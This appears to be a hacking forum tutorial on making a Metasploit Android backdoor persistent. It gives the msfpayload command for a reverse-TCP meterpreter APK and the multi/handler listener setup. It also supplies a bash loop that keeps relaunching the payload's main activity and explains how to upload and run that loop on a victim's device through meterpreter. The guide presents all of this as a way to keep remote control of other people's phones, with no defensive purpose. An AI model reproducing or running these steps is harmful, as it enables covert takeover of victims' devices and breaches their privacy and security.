How to Create a Persistent Back Door in Android Using Kali Linux:

OR rather How to make the Backdoor Persistent:

Hello, my Cold and Merciless Hackers,

Welcome to my 5th Post,

In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.

I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites.

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.

I'll be hacking on WAN, using a VM.

• Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk

• Now, lets set-up a Listener:
• msfconsole
• use exploit/multi/handler
• set payload android/meterpreter/reverse_tcp
• set LHOST 192.168.0.4
• exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)

--------------------------------------------------------------------------------------------------------

#!/bin/bash

while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done

--------------------------------------------------------------------------------------------------------

(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)

(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)

(You can set the sleep to any amount of seconds you want the script to sleep)

Move/Copy this to the Home/Root folder of KALI.

--------------------------------------------------------------------------------------------------------

Updated Script v3 (Compatible with any android version)

CRITICAL:DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\

..I guess, you will have to write it on your own.. (Don't ask me why..)

Code:

--------------------------------------------------------------------------------------------------------

#!/bin/bash

while :

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done

--------------------------------------------------------------------------------------------------------

There is a 'space' between 'while' and ':'

NO Multiple spaces in the script.

NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!

To do this, navigate to the directory using the following commands:

• cd /

Now you should be in the ROOT directory, you can check by typing:

• ls

Now type:

• cd etc

Check again by typing:

• ls

Again change directory:

• cd init.d
• ls

Here we are...

Time to Upload the Shell Script:

Do this by typing:

• upload anything.sh

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot

> However, it will not be persistent after the android system on the Victim goes for a Reboot.

> To do this upload the script anywhere in the sdcard:

• cd /
• cd /sdcard/Download
• ls
• upload anything.sh

Done! Uploaded!

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.

Drop into the system's shell by typing:

• shell

Now, navigate to the location of the script:

• cd /
• cd /sdcard/Download
• ls

Now its time for EXECUTION. Type:

• sh anything.sh

The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)

Reboot to eliminate the script or use Task Killer

Step 5: Testing...

You can test it by exiting from meterpreter and again setting up a Listener.

You should get a meterpreter prompt automatically!

PROOF:

Wow! It happened so Fast that 3 sessions got opened one after another.

(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

• The persistence of the backdoor will only remain until a reboot of the android system.
• If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
• Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
• If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!

2)The Persistence will remain forever on LAN Obviously

Good-Bye Hackers!

Keep Coming For More!

I'll be waiting for Your Likes and Comments,

Thank You,

F.E.A.R.